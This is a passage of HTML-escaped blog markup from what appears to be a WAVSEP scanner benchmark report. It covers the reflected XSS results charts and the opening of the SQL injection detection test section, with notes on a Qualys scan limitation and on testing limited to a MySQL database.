During the assessment of&amp;nbsp;&lt;b&gt;Qualys&amp;nbsp;&lt;/b&gt;it is highly likely that an optimization mechanism&amp;nbsp;&lt;b&gt;affected&amp;nbsp;&lt;/b&gt;the&amp;nbsp;&lt;b&gt;scan results&amp;nbsp;&lt;/b&gt;of&amp;nbsp;&lt;b&gt;POST&amp;nbsp;test&amp;nbsp;cases&amp;nbsp;&lt;/b&gt;&lt;b&gt;(compared to WAVSEP 2012 results)&lt;/b&gt;. Although in the case of other vendors disabling similar mechanisms solved the problem, in the case of Qualys this optimization mechanism could not be disabled via the configuration interface. We are currently trying to find solutions to the problem.&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Reflected XSS Detection Accuracy of Commercial/SAAS
Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_35&quot;
 o:spid=&quot;_x0000_i1040&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:159pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image052.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSDc-WRaa8pjQtSQ3vzj4rSoxdLMBzFb60JHKEz_kTcbrfXsJizLJvhOj37o8z1iAOMBNfSVzozv2zdmTR28VDUvReOHJbLIX1RI71uSL8BjddVP7qh0t8TF_Tr5eJOMdRzAd2YFZ4VC0/s1600/%252819%2529+Test+7-+Commercial+AND+SAAS+-+RXSS.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSDc-WRaa8pjQtSQ3vzj4rSoxdLMBzFb60JHKEz_kTcbrfXsJizLJvhOj37o8z1iAOMBNfSVzozv2zdmTR28VDUvReOHJbLIX1RI71uSL8BjddVP7qh0t8TF_Tr5eJOMdRzAd2YFZ4VC0/s1600/%252819%2529+Test+7-+Commercial+AND+SAAS+-+RXSS.png&quot; height=&quot;246&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Reflected XSS Detection Accuracy of Opensource/Free
Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_36&quot;
 o:spid=&quot;_x0000_i1039&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:330pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image054.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHOZyDAI0Nk2M-bbgThnOD4iJXYpoaAM_Q1UDy3eb7nxDsQHfA2ORoOHdc9dtbQRuWpIwxXArFLaEpd1FuDY23pdqPvd1x0VpGpmXe_Px0SOVR3LiXO0WeY3e7Ozi1ohNS96eIGar-zts/s1600/%252820%2529+Test+7-+Opensource+-+RXSS.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHOZyDAI0Nk2M-bbgThnOD4iJXYpoaAM_Q1UDy3eb7nxDsQHfA2ORoOHdc9dtbQRuWpIwxXArFLaEpd1FuDY23pdqPvd1x0VpGpmXe_Px0SOVR3LiXO0WeY3e7Ozi1ohNS96eIGar-zts/s1600/%252820%2529+Test+7-+Opensource+-+RXSS.png&quot; height=&quot;508&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Reflected XSS Detection Accuracy of Scanners - Unified List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_37&quot;
 o:spid=&quot;_x0000_i1038&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:315pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image056.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU7IK50L4Rgd5DyjVFdhob3CZRP_qa5epxTSUHj3-2ariDFN2ytUzY_qItI-zG5zWJaxTO6fsuOOI-PUwzYxW0LAl9xjqRxmDKD8BZShdNSEHQxig5M8mGPwjQ3QKvqgtvnMjuBVaySqE/s1600/%252821%2529+Test+7-+Unified+-+RXSS.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU7IK50L4Rgd5DyjVFdhob3CZRP_qa5epxTSUHj3-2ariDFN2ytUzY_qItI-zG5zWJaxTO6fsuOOI-PUwzYxW0LAl9xjqRxmDKD8BZShdNSEHQxig5M8mGPwjQ3QKvqgtvnMjuBVaySqE/s1600/%252821%2529+Test+7-+Unified+-+RXSS.png&quot; height=&quot;484&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormalCxSpMiddle&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-indent: -18pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;background-color: white; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Times New Roman&#39;, serif; font-size: 18pt;&quot;&gt;15. &lt;u&gt;Test VIII – SQL
Injection Detection Accuracy&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;15. Test VIII - SQL Injection Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The eight assessment criterion was the good old SQL
Injection detection accuracy, another assessment suite that&#39;s been with us for
the last four years (!) of WAVSEP benchmarks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As one of the most famous exposures (and powerful attacks) and
the most commonly implemented attack vector in web application scanners, it&#39;s
also one of the aspects in which maintained projects showed the &lt;b&gt;greatest
improvement&lt;/b&gt; over the years.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent1; mso-background-themetint: 102; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although the release of WAVSEP 1.5 includes optional
  vulnerable SQL injection test cases that were adjusted to support other
  databases (such as MSSQL, ORACLE, etc – contributed due to the endless
  generosity of the ZAP team members), due to time constraints, the evaluation
  was only performed on an application that used MySQL 5.5.x as its data
  repository, and thus, can only reflect the detection accuracy of the tool
  when scanning an application that uses similar data repositories.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;My assumption however, is that the detection results of
  error-based test cases and behavior based test cases will be nearly identical
  if the underlying database will be different, but that there will be a
  difference for some of the tested tools in test cases that require time-based
  detection methods (in which some scanners may not support using the
  appropriate database-specific time delaying function).&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The comparison of the scanners&#39; SQL injection detection
accuracy is documented in detail in the following section of sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/sql-injection-detection-accuracy-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/sql-injection-detection-accuracy-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Result Chart Glossary&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note that the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case
detection accuracy, while the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt;&amp;nbsp;&lt;/b&gt;bar
represents false positive&amp;nbsp;&lt;u&gt;categories&lt;/u&gt;&amp;nbsp;detected by the tool
(which may result in more instances then what the bar actually presents, when
compared to the detection accuracy bar).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;b&gt;Note:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
During the assessment of&amp;nbsp;&lt;b&gt;Qualys&amp;nbsp;&lt;/b&gt;it is highly likely that an optimization mechanism&amp;nbsp;&lt;b&gt;affected&amp;nbsp;&lt;/b&gt;the&amp;nbsp;&lt;b&gt;scan results&amp;nbsp;&lt;/b&gt;of&amp;nbsp;&lt;b&gt;POST&amp;nbsp;test&amp;nbsp;cases (compared to WAVSEP 2012 results)&lt;/b&gt;. Although in the case of other vendors disabling similar mechanisms solved the problem, in the case of Qualys this optimization mechanism could not be disabled via the configuration interface. We are currently trying to find solutions to the problem.&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The SQL Injection Detection Accuracy of Commercial/SAAS
Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_38&quot;
 o:spid=&quot;_x0000_i1037&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:267pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image058.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKlJAU2hhjxAy0b-YVVgMZgjgGQQKbfrP0_cA5EfCkUCsuZ_2_MybJyX6l5yohYndayXrZvv_SjvOlxl_-nUahWAiuLVTjIYTupfBJ8CTz03XIg28dwWpjbcvbO6IpjhVE0uKc1zDxoKQ/s1600/%252822%2529+Test+8-+Commercial+AND+SAAS+-+SQL+Injection.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKlJAU2hhjxAy0b-YVVgMZgjgGQQKbfrP0_cA5EfCkUCsuZ_2_MybJyX6l5yohYndayXrZvv_SjvOlxl_-nUahWAiuLVTjIYTupfBJ8CTz03XIg28dwWpjbcvbO6IpjhVE0uKc1zDxoKQ/s1600/%252822%2529+Test+8-+Commercial+AND+SAAS+-+SQL+Injection.png&quot; height=&quot;410&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The SQL Injection Detection Accuracy of Opensource/Free Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_39&quot;
 o:spid=&quot;_x0000_i1036&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:386.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image060.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
